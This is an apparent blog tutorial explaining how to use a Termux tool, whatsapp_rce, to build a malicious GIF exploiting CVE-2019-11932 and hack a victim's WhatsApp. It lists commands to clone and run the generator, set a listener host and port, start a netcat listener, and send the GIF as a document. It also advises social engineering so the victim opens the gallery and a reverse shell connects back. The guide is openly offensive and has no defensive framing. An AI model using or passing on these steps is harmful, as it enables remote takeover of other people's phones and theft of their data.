whatsapp_rce - Termux WhatsApp remote code execution

Hello guy’s in this article we are going to discuss about how to hack whatsapp with gif image. just you follow the below procedure step by step.

what is whatsapp_rce?

This is a Automated Generate Payload for CVE-2019-11932 (WhatsApp Remote Code Execution)

  • Auto install GCC (no harm command, you can see this is open-source)
  • Saving to .GIF file


  • Android version 5.0 and above
  • Termux
  • Git package

How to install and use whatsapp_rce

Step 1:

First type this below command in your termux terminal this command will help you to download the whatsapp_rce package.

git clone https://github.com/TinToSer/whatsapp_rce.git

whatsapp_rce - Termux whatsapp remote code execution

Step 2:

Now type this below command this command will help you to open the whatsapp_rec folder on your termux terminal.

cd whatsapp_rce

whatsapp_rce - Termux whatsapp remote code execution

Step 3:

Now we give permission read, write and execution of start.sh bash file so type this below command on your termux application.

chmod +x start.sh

whatsapp_rce - Termux whatsapp remote code execution

Step 4:

Now type this below command on your termux terminal this command will help you to run this tool on your terminal.

bash start.sh

set your lhost

Step 5:

Now you type your listener LHOST and LPORT on your termux terminal.
set your lport


 How Get Shell?

  • You just send the .GIF file to victim user AS A DOCUMENT NOT IMAGES
  • And set the nc / netcat to port you set on the WhatsRCE tools {nc -lnvp your_port}
  • You can use the Social Engineering attack so that victims can be attracted to launch this exploit
  • tell the victim to open the gallery via whatsapp and send the victim to send any photos (no need, it’s just got to the gallery no problem) after that a few seconds later you will receive a shell connection from the victim

Sample video file


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